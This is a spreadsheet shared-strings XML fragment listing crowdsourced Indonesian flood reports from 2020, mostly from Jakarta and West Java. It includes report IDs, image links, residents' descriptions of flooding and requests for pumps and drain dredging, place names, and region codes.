  <si>
    <t>97a43883-fba3-48df-b76a-167360b5a474</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-97a43883-fba3-48df-b76a-167360b5a474.jpg</t>
  </si>
  <si>
    <t>Jl Arif Rahman hakim kota Depok banjir harap berhati-hati karena cukup dalam</t>
  </si>
  <si>
    <t>Depok Jaya</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-ksWgcU4jujjpQIm9jo_gKCCdWCzcFgH0s_NncK-rvsh3_Whq6WMWSruROfq-i8TmLRHgBkyUJUNZXSrfl-88b0ov3to=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirBandang #BanjirKiriman air sudah MULAI masuk rumah... tolong dibantu pompa Dan juga solusinya Para pihak terkait...khususnya pejabat pemerintah di kelurahan pejaten barat, Kecamatan pasar Minggu RT. 3-7 untuk banjir di sek</t>
  </si>
  <si>
    <t>15e8571d-87ef-4bef-aeb5-fcb65dd43756</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-15e8571d-87ef-4bef-aeb5-fcb65dd43756.jpg</t>
  </si>
  <si>
    <t>Banjir di komplek sangrila indah 2, Kel. Petukangan selatan, Pesanggrahan, Jaksel</t>
  </si>
  <si>
    <t>3710b86d-3643-4582-8431-64aaa6847097</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-3710b86d-3643-4582-8431-64aaa6847097.jpg</t>
  </si>
  <si>
    <t>Jl kemang selatan x a sampai jam 3 pagi ini banjir belum juga surut dan terus merambat naik padahal  hujan sudah berhenti 2 jam yang lalu.</t>
  </si>
  <si>
    <t>https:--pasangmata.detik.com-contribution-354798</t>
  </si>
  <si>
    <t>https:--akcdn.detik.net.id-community-pasma-2020-10-05-16018511951250146716.jpg</t>
  </si>
  <si>
    <t>Waspada Deras dan Meningginya Aliran Sungai Ciliwung</t>
  </si>
  <si>
    <t>Terlihat ada aliran air yang begitu deras dan meninggi di sungai Ciliwung pagi ini, Warga yang tinggal di bantaran sungai Ciliwung harap waspada.</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-rN-sKxawyJw7tMzxvH8_jLFQmWhXcbhsTcD1OHpdMSUL3PX8eQh3MXMwYziphzODeoyZJcC8X6FhwFKwpd3qoe4EXBTk7Q=s480-c</t>
  </si>
  <si>
    <t>tolong TL biasa cuma formalitas sampah2 kecil doank yg diambil.toling dikeruk lumpur got</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-8tsGhqOP2b9lAJPJCXv42ZfQhON9uG2YXTztAa_Opl1JkB2MymS0qAS5wDnq4rLyCds6lJgbVIxpy94-I9woSeGPy5F-0g=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1125", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-wVen2LHk1bn4FN6HcBa0R4ftPzETWz_h1EXQldtv6epen6qwzgwMmLelRPcfxCWsANqZt1uA1vs7eedv9Npb7tM__7a2IA=s480-c</t>
  </si>
  <si>
    <t>tolong dong,..sampah nya,di kali bnyak bngt,jadi ga maksimal,aliran air nya #KaliMeluap</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-jNfLNwFFxSdAiDZsiD4Q2k4D8qZ2bdFkBIF9D0Z1zSvKkYK1LbqzqPbuBv9KunEFXDG2OskFHuPk-lfqo_pVFv8zCtKOjw=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap karna bnyak sampah</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-w-bIhnCuukzpObkGJBflTSOABDSceaWuG0UAr0bqBHfZn3VncRB7aBieEDXPy32gJH8-N7vYMqPJahYTDP7bUC-aBIWggQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "875", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil klo hujan dikit dh banjir,,di rt 006 rw 002,,rt ny ga peduli sama warga,,,tolong dnk pa @aniesbaswedan rt di sini sudah 3 periode ga di ganti? gmn ini,,lurah ciganjur,,rt ny sama sekali ga peduli sma warga,,selokan buat pembuangan air ga di</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-AZcy_gwtxC_Dphgubb9FW7rmXGVliNgbyAXvnKg_WYcMpbrJRLxcyxyOyrZT8VPtWpLH9GZ9RZS3FA5rfG6ydz1z8DE=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1050", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>saluran air di tutup cor sehingga mengakibatkan banjir</t>
  </si>
  <si>
    <t>Grogol Selatan</t>
  </si>
  <si>
    <t>bad5ffd2-b366-4bca-9fe0-13435b61b632</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-bad5ffd2-b366-4bca-9fe0-13435b61b632.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-SR" }</t>
  </si>
  <si>
    <t>Jika Hujan dalam intentitas rendah turun dalam beberapa jam kami tidur dengan air</t>
  </si>
  <si>
    <t>Kalukku</t>
  </si>
  <si>
    <t>Mamuju</t>
  </si>
  <si>
    <t>Sulawesi Barat</t>
  </si>
  <si>
    <t>3e081f3e-38aa-42f2-bc9f-59f173a35ed6</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-3e081f3e-38aa-42f2-bc9f-59f173a35ed6.jpg</t>
  </si>
  <si>
    <t>Banjir di Depan Kampus UPN YOGYAKARTA</t>
  </si>
  <si>
    <t>Condong Catur</t>
  </si>
  <si>
    <t>419889e5-75e1-47a0-b25e-d6d5a145ea03</t>
  </si>
  <si>
    <t>Banjir genangan air</t>
  </si>
  <si>
    <t>Pondok Cina</t>
  </si>
  <si>
    <t>Beji</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-_Y3csASlHtCjo7dMFmttbzOauskZi5aUPQCu1wRrY3e4ejMQEsvuge8WLd1TDMLVPy1BSUuxJZZbMMkUBT8lEoxHD31k=s480-c</t>
  </si>
  <si>
    <t>banjir di gebang sari dalam III RT 7-5 Bambu apus</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-XoNTNCl0YGpTIckuobfyqZNoQlgwdZ6vl5MPKCN4fwHmAeKIVdmrM0EHXALtv5MNHLvzDhfNMb-bpXFuHf5ptBYsCS0x=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2010", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di jalan damai 3 bawah no. 90 dekat kali</t>
  </si>
  <si>
    <t>Kalisari</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-UarSccLCoXOLrNJmQTEXiN8pQVGAq9VHYL24jfQn7eappAzINuUObALPHFviT4rHqkkTMvtSIhxeduiz8xY0nOGFGXoH=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1530", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjirr rumah ada 4 rumah,, sebelomnya udh pernah minta perbaikan... tolong dong bantu penanganan saluran Airnya.. Makasih.. Jln Kadih jln kavling Dki kel Cipayung kec Cipayung.. Jakarta timurr..</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-TqdFJx0ZGvd--FBtz0VHxRvQWnhOcBO9gq6qaSeFl1-4FZ0HHxhnuC4KdYCcZAqtfxWAEObW-f14yeoYIfsbTOVSl20=s480-c</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-8HS4caTG-b6s3R6LhKRX0tK-xRERKvnekPu2_aMCR1UfEITBX4ZmUSUFhPqlT1DVycYebQwn88TzsZ-ez_6Oz22lbtVv=s480-c</t>
  </si>
  <si>
    <t>Banjirr rumah ada 4 rumah,, sebelomnya udh pernah minta perbaikan... tolong dong bantu penanganan saluran Airnya.. Makasih.. Jln Kadih jln kavling Dki kel Cipayung kec Cipayung.. Jakarta timurr.. Tolong Petugass terkait bantuannyaa... makasih..</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-LSqMTJqbY7A2DBFAo16oaTE3MmdCRWVCvrwRxc1HkOiqKfTvSgQGjY3rbkW-5Kv2YVcabUkpnmfYw3VgtXMC7Sx9pyU_=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1054", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjiiiir, jl. cidodol raya komplek loka permai grosel keb lama jaksel, kapan kali sekretarisnya dilebariin bapak2 terhormatt</t>
  </si>
  <si>
    <t>ba6eea23-eb20-470f-bc34-9c845721fdeb</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2411", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi dada di luar</t>
  </si>
  <si>
    <t>a83fabca-6b00-4e55-bffa-249844a923a0</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-a83fabca-6b00-4e55-bffa-249844a923a0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1667", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sejak isya. Sejam kemudian hujan berhenti mulai turun. Kemungkinan saluran besarnya mampet."</t>
  </si>
  <si>
    <t>d8ca43d8-90b8-4d41-965a-d7d38689fd32</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-d8ca43d8-90b8-4d41-965a-d7d38689fd32.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2697", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di komplek sangrila indah 2, petukangan selatan, luapan kali dan bocornya saluran air jalan tol ciledug</t>
  </si>
  <si>
    <t>38fe50d4-0bad-4b13-be54-de7e4057a0f6</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-38fe50d4-0bad-4b13-be54-de7e4057a0f6.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1655", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air deras dari atas gg subur. H BAPING. Ciracas.</t>
  </si>
  <si>
    <t>309a6f0c-d5a9-434c-978b-47ae9087316b</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-309a6f0c-d5a9-434c-978b-47ae9087316b.jpg</t>
  </si>
  <si>
    <t>aa3c9a50-5e44-47c9-acd8-e0f4399a50b0</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-aa3c9a50-5e44-47c9-acd8-e0f4399a50b0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2406", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ab12588c-41a7-4321-9c5e-be539d79232d</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-ab12588c-41a7-4321-9c5e-be539d79232d.jpg</t>
  </si>
  <si>
    <t>Info Banjir ada 4 rumah, sebelomnya bln2 lalu udh pernah minta perbaikan msalah saluran air,  sekarang malah tambah banjirnya..tolong..</t>
  </si>
  <si>
    <t>8956f077-ced5-44bc-8fba-e964b524ca15</t>
  </si>
  <si>
    <t>tadi jam 10pm belum masuk rumah, 10.30pm udah masuk dan sekarang naiknya cepet airnya</t>
  </si>
  <si>
    <t>92b62829-8568-4896-b176-4afe4c0d7a4d</t>
  </si>
  <si>
    <t>Green T Residence III, Jalan Gebang Sari Dalam III.</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-6BVDap4y8xfGE7C8wemhTt0_4naap0MCRNdnZ8AbvKqJcJZM7DzFdfa2RhOlQJ6luoZyPiZ1Y07Q7oRnMwt3U4sSy-_JxA=s480-c</t>
  </si>
  <si>
    <t>banjir, harap pompa diaktifkan.</t>
  </si>
  <si>
    <t>https:--pasangmata.detik.com-contribution-354988</t>
  </si>
  <si>
    <t>https:--akcdn.detik.net.id-community-pasma-2020-10-10-1602347781545281822.jpg</t>
  </si>
  <si>
    <t>Satgas PMI Jaksel Evakuasi Warga Ciganjur Terdampak Longsor</t>
  </si>
  <si>
    <t>Satgana PMI Kota Jakarta Selatan melakukan evakuasi warga terdampak banjir dan longsor di Kel. Ciganjur, Jagakarsa, Jaksel, Sabtu (10-10) malam.</t>
  </si>
  <si>
    <t>ada5911e-1005-42de-928e-16201bed8e36</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-ada5911e-1005-42de-928e-16201bed8e36.jpg</t>
  </si>
  <si>
    <t>Komplek bumi harapan permai, kel dukuh, kec kramatjati</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-vs02fQOkYjuFvlRGnq8Fxkup_M8hONDvAetZdRmFAqm9aPXgYhwsIdQKen5av3CFboSYeG0ATpaoTrnM9WPFhUUxhieZ=s480-c</t>
  </si>
  <si>
    <t>Warga Cipinang Melayu Kecamatan Makasar RT01-RW04 kebanjiran, kondisi dilokasi banjir Masih hujan #KaliMeluap #BanjirKiriman</t>
  </si>
  <si>
    <t>526dfc62-b6ef-47b5-b11b-9fc080d2142d</t>
  </si>
  <si>
    <t>Daerah kelurahan petogogan jakarta selatan</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-el-fEWIHN5tXhSTTa-MhDuFUemt8dxdVkCF1I0WRzMjctZb1y6kZpUDuLu3CM5EZGxiVJOk3JdqBQKLxvBRX7JCOE9tl_g=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1526", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tolong segera di TL banjir di jl Basuki Pulau harapan 7 belum ada sama sekali petugas untuk membantu</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-a4VsY3o-jxidaYJK1GNoJqobW60H3faHy0-yu0jpj7labAfNQ6KoyzksUvoEJY_KdkzQOEwBufz8Cdf_o8EwyX_Xwe8sJg=s480-c</t>
  </si>
  <si>
    <t>tanggul bocor masuk ke perumahan #BanjirKecil #KaliMeluap</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-hTT3n5d0JxI5epCZsBrUmH4cjiaXO8GAGea5xTWuyETF3SZNCwfCzFTfhSyxqXz1aDKyHFCrb9bzqbaosF1MibpymHyf9g=s480-c</t>
  </si>
  <si>
    <t>ini masalah hilir cipinang,....siphon kali cipinang -kali malang sudah full capacity.. usul nya ditambah penampang basah siphon, catchment area kali cipinang yang sedemikian besar harus "dipaksa" - terpaksa lewat siphon yang minim itu..apalagi kawasan ca</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-kMMndRzkZPW2GVbjcGUh5yKNKv19O_tpeIz_5eFiFKvct7zKM0aJZOc1zrDniIQ-J1Jh3ejnIyg4xitw1RQp2TH5EkZY=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1517", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>saluran air rusak</t>
  </si>
  <si>
    <t>4f730f0e-d133-4db2-ac3c-597828262525</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-4f730f0e-d133-4db2-ac3c-597828262525.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 151 }</t>
  </si>
  <si>
    <t>longsor dan banjir terjadi di beberapa titik: Leuwi Nanggung, Cisompet, Heras, Cigadog, Pameumpeuk, kaum lebak"</t>
  </si>
  <si>
    <t>ccdee9aa-2a07-4537-9413-9dbccc44f9ed</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-ccdee9aa-2a07-4537-9413-9dbccc44f9ed.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2099", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-e6FulvFtDAX9R8YEHWDoHqw7dOQb9o8CQB5bkFa9HWcLydjtADeDOlziAo1eY0grG7_zLDVl09TIrj3afVuLfu653VAM=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "944", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di jl. h. Amsar Cipulir Kebayoran lama Jakarta Selatan</t>
  </si>
  <si>
    <t>Cipulir</t>
  </si>
  <si>
    <t>1bc0db90-da4d-4166-bc85-d11d5a4d9317</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2226", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Baru banjir beberapa menit udah langsung banjir, masuk ke rumah saya malah. Mungkin akibat jalan sering di tinggiin trus rumah sayanya renda</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-uSBGGQ6kAlt9tSrS-IAOdn496I14i2j56j5PY_x-FDKdDT5nboCbkzsCt54OavROfx3kStBJuDug3L3TS37cz0Q81gs=s480-c</t>
  </si>
  <si>
    <t>Banjiiiirrrr...Wilayah RW 04 Tanjung duren Utara banjir setinggi lutut orang dewasa. padahal hujan baru sebentar. sampai kapan wikayah kami terus begini. Tolong di TL dan dicarikan Solusinya.</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-EKuKylB4KH_SQptkWoEFtXdpyHEuRGUJzrqDzfoIHSqAXFeOf-Iy5eIcAhyHtBbxm6d8iUXi_Os_ffGCoKp69N8xxetA=s480-c</t>
  </si>
  <si>
    <t>tolong banjiirr.. nyalain pompa penyedotnya..</t>
  </si>
  <si>
    <t>35274383-603f-4df5-a039-7af647d44d30</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-35274383-603f-4df5-a039-7af647d44d30.jpg</t>
  </si>
  <si>
    <t>Banjir sepinggang warga butuh evakuasi, ada anak kecil</t>
  </si>
  <si>
    <t>0f5ce3de-5eb4-4b96-981e-4041f29a6c4f</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-0f5ce3de-5eb4-4b96-981e-4041f29a6c4f.jpg</t>
  </si>
  <si>
    <t>Banjir di komplek Sangrila Indah 2, Kelurahan Petukangan selatan, Kec.Pesanggrahan, Jaksel.</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-lTi3p8eggTz5DH2pqXZ3kJrVDF7qMDbVKn3sJq8usHBDEpt3zcdRVipCYY-_ztfPT0pfJQMYhw6MgA_TVks92rgOP4wc=s480-c</t>
  </si>
  <si>
    <t>banjirree.. pompanya doooonnkkk</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-r65RSQ9m1Anmvfo_-GssFTJjkIr-1hlfHzNYz5wgcqP-1mH-52P5YIESXsd2LU2dwCC1aUZZYk_MbxRiwj93TkJIrFXK=s480-c</t>
  </si>
  <si>
    <t>#SaluranTersumbat #SaluranKotor #KaliKotor #KerukKali #SampahDiSaluran #SaluranDitutup #SampahDiKali  tolong udah ksh masukan udah tahunan tp tdk ada perubahan sama sekali??????????????</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-UFI3gjSQ5syF3U4TduuqxTPPiLBjclmLabE5PDYW4ojLWCDhCvKSzx_0-M0VEG-MiQlj61j7J6rDCLa62ZtbZbrlRTc=s480-c</t>
  </si>
  <si>
    <t>hujan belum 1 jam sudah banjir. tolong  perhatian nya . mengingat musim hujan sudah mulai.</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-vkUXVUWDZ2pkO8zx5n0MpGvyK4VwNP5uZawBU7ClGZGtZdHu2AEb7eROthH_aBoL4sGd65mvmzxOvhZkyPxOsJVawqIkXg=s480-c</t>
  </si>
  <si>
    <t>#SaluranTersumbat #SaluranKotor #KaliKotor #KerukKali #SampahDiSaluran #SaluranDitutup #SampahDiKali  tolong TL serius jangan cuma formalitas foto2 doank??</t>
  </si>
  <si>
    <t>848dc35f-e40f-495e-96dd-03360d4e7df4</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-848dc35f-e40f-495e-96dd-03360d4e7df4.jpg</t>
  </si>
  <si>
    <t>Hujan semalam menenggelamkan jembatan satu-satunya akses untuk keluar masuk ke lokasi perumahan Rizki Amanah Mohon batuan pengerukan sungai"</t>
  </si>
  <si>
    <t>Mentawa Baru Hilir</t>
  </si>
  <si>
    <t>Mentawa Baru-Ketapang</t>
  </si>
  <si>
    <t>736689af-95d7-44cb-9205-dba65b456252</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-SA" }</t>
  </si>
  <si>
    <t>Banjr terjadi karena curah hujan dari sore sampai saat ini</t>
  </si>
  <si>
    <t>Kairagi Satu</t>
  </si>
  <si>
    <t>Mapanget</t>
  </si>
  <si>
    <t>Manado</t>
  </si>
  <si>
    <t>Sulawesi Utara</t>
  </si>
  <si>
    <t>77cf3db6-d4cb-46b1-addf-2814307f75fc</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-77cf3db6-d4cb-46b1-addf-2814307f75fc.jpg</t>
  </si>
  <si>
    <t>Banjir hari kedua nih lebih tinggi dari hari sebelumnya</t>
  </si>
  <si>
    <t>Laksamana</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-VeTgMXJXxAI48eQkUkNsj-c3hE5wPtGjtrsMcJ0yI-a5nHZiXrCh3zYHVEITAsuDZq5zd-7-N_Lcdcp42Ub75aOJX70=s480-c</t>
  </si>
  <si>
    <t>Banjir di komplek loka permai, cidodol kebayoran lama. Sejak awal 2020 banjirnya tinggi, mohon segera diurus oleh PEMDA</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-mBsfJJgL_2g2k_ArQiL6y-Wxgb_QivnPZyvkD6EcXMm_SPy5c27hyZt4e_03dLWddlNHWc8Y344_3FmtUcTFwv5WkiM=s480-c</t>
  </si>
  <si>
    <t>banjiiiir lika permai cidodol jaksel, kerja yg bene kenapa bpk2 pemda yg terhormat</t>
  </si>
  <si>
    <t>0031488f-e178-499c-99b1-1eb84f6dbefc</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-0031488f-e178-499c-99b1-1eb84f6dbefc.jpg</t>
  </si>
  <si>
    <t>Air sungai meluap setiap hujan besar</t>
  </si>
  <si>
    <t>Hanum</t>
  </si>
  <si>
    <t>Dayeuhluhur</t>
  </si>
  <si>
    <t>9d76b858-5b6f-449f-94d1-f7c6f388544b</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-9d76b858-5b6f-449f-94d1-f7c6f388544b.jpg</t>
  </si>
  <si>
    <t>Banjir di Pluit m.angke</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-GMtM-MK5PAVYXvqbOT_IXZj_Sz6Euym_6j6uaF0AoNyh0mgQ_ok_ETk4Ei6Y6G-1JUwG2NFn2STRFrtoKzxsXPP7AB6xGg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "273", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil Ini Got penuh sampah dan lumpur</t>
  </si>
  <si>
    <t>8bdd0326-9f54-41bc-a5c6-c7b56c5c1aed</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-8bdd0326-9f54-41bc-a5c6-c7b56c5c1aed.jpg</t>
  </si>
  <si>
    <t>banjir sekitar 40 cm di gang ngari, tanjung gading, bandar lampung yang di sebabkan oleh penutupan saluran air oleh masyarakat yang sebelah.</t>
  </si>
  <si>
    <t>Tanjung Gading</t>
  </si>
  <si>
    <t>Tanjung Karang Timur</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-43-k6JyDR81Oln5evNnECzP23zb_gfOcHX97ZelkFT3P7GY6Y1ZRVs7eF6sEsF-FOuiVYK0AiarXGQazL9KXshsND1aR=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil tolong ditindak lanjuti lokasi di kp pengarengan Rt014-012 gg al-qiroah,setiap hujan besar selalu banjir krn drainase yang kurang baik, mohon di tindak lanjutu</t>
  </si>
  <si>
    <t>https:--pasangmata.detik.com-contribution-355164</t>
  </si>
  <si>
    <t>https:--akcdn.detik.net.id-community-pasma-2020-10-20-1603197684555440811.jpg</t>
  </si>
  <si>
    <t>Rumah Warga Terendam Banjir, Imbas Hujan Deras di Ciamis</t>
  </si>
  <si>
    <t>Akibat hujan deras yang mengguyur sebagian besar wilayah Ciamis, terlihat sebuah rumah yang berada di Lembur Balong, Kelurahan-Kecamatan Ciamis Kab. Ciamis terendam banjir, Selasa, (20-10-2020) sore. Terlihat air tersebut sangat kotor sehingga penghuni r</t>
  </si>
  <si>
    <t>https:--pasangmata.detik.com-contribution-355240</t>
  </si>
  <si>
    <t>https:--akcdn.detik.net.id-community-pasma-2020-10-24-1603543992186099353.jpg</t>
  </si>
  <si>
    <t>Perhatian! Debit Air Sungai Cikeruh Meningkat Malam Ini</t>
  </si>
  <si>
    <t>Debit air sungai Cikeruh malam ini mengalami peningkatan, seperti yang terlihat di wilayah RW. 09 Desa Cikeruh, Jatinangor, Sumedang, pada Sabtu, (24-10-2020) malam. Hal ini disebabkan karena hujan yang cukup deras di wilayah hulu sungai. Terlihat Babins</t>
  </si>
  <si>
    <t>cbc05661-dcb4-4a27-ab6d-ff9fb367c278</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-cbc05661-dcb4-4a27-ab6d-ff9fb367c278.jpg</t>
  </si>
  <si>
    <t>banjir di villa nusa indah 1 dan 2, siap2 villa mahkota permai</t>
  </si>
  <si>
    <t>f59c9bec-47b5-414d-897a-51fe4247924d</t>
  </si>
  <si>
    <t>Banjir butuh tim penolong</t>
  </si>
  <si>
    <t>56bd6296-b0ab-4b4b-a9ab-d5ea8cc9ad73</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-56bd6296-b0ab-4b4b-a9ab-d5ea8cc9ad73.jpg</t>
  </si>
  <si>
    <t>Banjir di daerah Villa Nusa Indah Desa Bojongkulur Kab. Bogor.</t>
  </si>
  <si>
    <t>0631c78e-fc16-4741-b0b3-5b8ab30593b1</t>
  </si>
  <si>
    <t>Banjir dengan rata2 50 cm sd 100cm</t>
  </si>
  <si>
    <t>4ec75d0e-6bf5-41ba-80a2-b82d60b9899c</t>
  </si>
  <si>
    <t>Banjir mulai selutut orang dewasa</t>
  </si>
  <si>
    <t>https:--pasangmata.detik.com-contribution-355246</t>
  </si>
  <si>
    <t>https:--akcdn.detik.net.id-community-pasma-2020-10-25-16035895122106165728.jpg</t>
  </si>
  <si>
    <t>Ciliwung Meluap, Bidara Cina Banjir</t>
  </si>
  <si>
    <t>Ciliwung meluap dampak banjir di Bidara Cina yang di pinggiran Ciliwung.</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-mhwAEEqV_dOXp_SaspIHcroHAzRaleB2jmdDFdbvaM1cyZIg313gDvIJrGtEbihVFELju0TNk0tVWgY2haj4rEFqBDVB1g=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1665", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir lagi, padahal hujan tidak lama, kali meluap di jl. sd inpres kelurahan rambutan, kapan akan #KerukKali</t>
  </si>
  <si>
    <t>385653fd-5717-4844-a38e-310c2c0f547c</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-385653fd-5717-4844-a38e-310c2c0f547c.jpg</t>
  </si>
  <si>
    <t>Ciumbuleuit</t>
  </si>
  <si>
    <t>Cidadap</t>
  </si>
  <si>
    <t>01b51212-5bc4-49bc-b960-1de54182cd2b</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-01b51212-5bc4-49bc-b960-1de54182cd2b.jpg</t>
  </si>
  <si>
    <t>Banjir di komplek Sangrila Indah 2, Kel. Petukangan Selatan, Kec. Pesanggrahan, Jaksel</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-bsYieLG2oneOGrzXvswPbzAng2mYM2P9g767W-1vMCkMS8GRyemHXTjoGSTa3Je7Y5nLjoftJ31oc7M3EB2s7Xdzm8hB=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap lagi, hujan padahal tidak besar, #kerukkali</t>
  </si>
  <si>
    <t>https:--pasangmata.detik.com-contribution-355290</t>
  </si>
  <si>
    <t>https:--akcdn.detik.net.id-community-pasma-2020-10-26-1603717034788091962.jpg</t>
  </si>
  <si>
    <t>Jalan Kincan Tergenang Air 20 Cm, Hati-hati Saat Melintas</t>
  </si>
  <si>
    <t>Jalan raya Kincan Tergenang Air 20cm Malam Ini</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-rB_588jO9ORb-dr1rvbRi3q4njTU4yB-3_J5FC_1e7cniPgzvDZYbtBmqVFkXHBOkJ9OEtuOvj-e-MDaM0-qkdkjCD_49A=s480-c</t>
  </si>
  <si>
    <t>selalu banjir jl sd Inpres-SD rambutan tolong dikondisikan bapak ibu yg terhormat"</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-g4sXBEvWaJfWbbm06LJ_vplzLDeNdfMIRbk48GpXyl7fyix2SUj3elZTROrUCvaqMJ7FwapPbOXOAE0pI_0HmlsKg90=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap ini juga sama sekitaran sd 03 rambutan, bisa sedada padahal hujan ga deras</t>
  </si>
  <si>
    <t>e3f4a144-f522-46aa-a36b-63ec5051fefe</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-e3f4a144-f522-46aa-a36b-63ec5051fefe.jpg</t>
  </si>
  <si>
    <t>Banjir akibat hujan deras. Banjir mulai masuk rumah pukul 23.50. Sampai sekarang masih meninggi. Hujan masih deras</t>
  </si>
  <si>
    <t>Gombong</t>
  </si>
  <si>
    <t>2d2f87b8-5f80-4056-84a0-e955f750d0e8</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-2d2f87b8-5f80-4056-84a0-e955f750d0e8.jpg</t>
  </si>
  <si>
    <t>Banjir bogor</t>
  </si>
  <si>
    <t>Kedungbadak</t>
  </si>
  <si>
    <t>0cabbc51-b3ae-4cdb-861a-74916b96615b</t>
